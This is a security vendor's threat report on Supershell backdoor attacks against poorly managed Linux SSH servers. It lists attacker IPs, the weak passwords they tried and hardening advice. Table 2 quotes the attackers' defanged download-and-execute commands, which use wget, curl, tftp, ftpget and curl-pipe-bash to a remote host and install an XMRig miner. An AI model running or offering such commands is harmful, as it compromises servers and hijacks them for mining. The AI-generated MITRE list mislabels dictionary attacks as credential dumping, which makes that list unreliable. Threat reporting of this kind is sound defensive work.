- Short Summary: AhnLab SEcurity intelligence Center (ASEC) has identified an attack involving the Supershell backdoor on poorly managed Linux SSH servers. This backdoor, developed in Go by a Chinese-speaking developer, enables remote control of infected systems and is often accompanied by attempts to exploit weak passwords through dictionary attacks.
- Key Points:
- Supershell is a backdoor malware that allows remote control of infected systems.
- It is developed in the Go programming language and supports multiple platforms.
- The malware was installed on inadequately managed Linux SSH servers.
- The threat actor used dictionary attacks to gain access to systems.
- Commands were executed to download and install Supershell from various sources.
- There is a potential link to cryptocurrency mining, as Supershell may be used to install CoinMiners.
- Recommendations for administrators include using strong passwords, regular updates, and security programs.
MITRE ATT&CK TTPs – created by AI
- Technique Name: Remote Access Software (T1219)
- Supershell acts as a reverse shell, allowing remote control of infected systems.
- Technique Name: Credential Dumping (T1003)
- Threat actors used dictionary attacks to attempt to log in to systems with weak passwords.
- Technique Name: Command and Scripting Interpreter (T1059)
- Commands were executed to download and install Supershell using shell commands.
- Technique Name: Data Obfuscation (T1001)
- The malware is obfuscated but can be identified through internal strings and behavior.
- Technique Name: Exfiltration Over Command and Control Channel (T1041)
- Supershell allows the threat actor to control the infected system and potentially exfiltrate data.
AhnLab SEcurity intelligence Center (ASEC) has recently discovered an attack case installing the Supershell backdoor on inadequately managed Linux SSH servers. Created by a Chinese-speaking developer, Supershell is developed in the Go language and supports various platforms including Windows, Linux, and Android. Its primary function is a reverse shell, which allows a threat actor to remotely control an infected system.
Figure 1. GitHub page of Supershell
It is suspected that the threat actor installed a scanner after infecting multiple systems and then attempted to log in through dictionary attacks from the following attack sources.
| Threat Actor IP | ID/PW |
|---|---|
| 209.141.60[.]249 | root / qwer |
| 179.61.253[.]67 | root / password root / a123456789 root / a1234567 root / newroot root / 123qaz!@# root / Passw0rd root / 123qweASD root / abc123 root / daniel root / 1qaz@wsx |
| 107.189.8[.]15 | root / doctor |
| 2.58.84[.]90 | root / Admin123! root / 123456qwerty root / cocacola root / qweasd!@# |
Table 1. Attack source addresses and credential information used during the login attempt process
After successfully carrying out the attack, the threat actor executed commands (see Table 2) to directly install Supershell or install a shell script that serves as a downloader. Supershell was downloaded not only through web servers but also via FTP servers.
| # cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r * # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * # cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r * # cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r * # cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1 |
Table 2. Commands identified in the attack case
The malware that is ultimately installed is obfuscated, but it can be identified as the Supershell backdoor through a few internal strings, its behavior, and the strings observed during its execution process.
Figure 2. Obfuscated Supershell
Figure 3. Log showing Supershell’s execution
In attacks targeting poorly managed Linux systems, it is common to see the installation of CoinMiners like XMRig or DDoS bots such as ShellBot and Tsunami. In the attack observed this time, the threat actor initially installed Supershell for control hijacking purposes. However, given that there are cases where XMRig Monero CoinMiners are also installed alongside Supershell, it appears that the attacker’s ultimate goal is to mine cryptocurrency.
| 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx |
Table 3. Threat actor’s Monero wallet address
Recently, Supershell has been installed on poorly managed Linux SSH servers. When the backdoor malware is installed, a Linux server can receive commands from the threat actor and be hijacked.
As such, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access from threat actors. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.
Detection Names
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)
Source : https://asec.ahnlab.com/en/83232/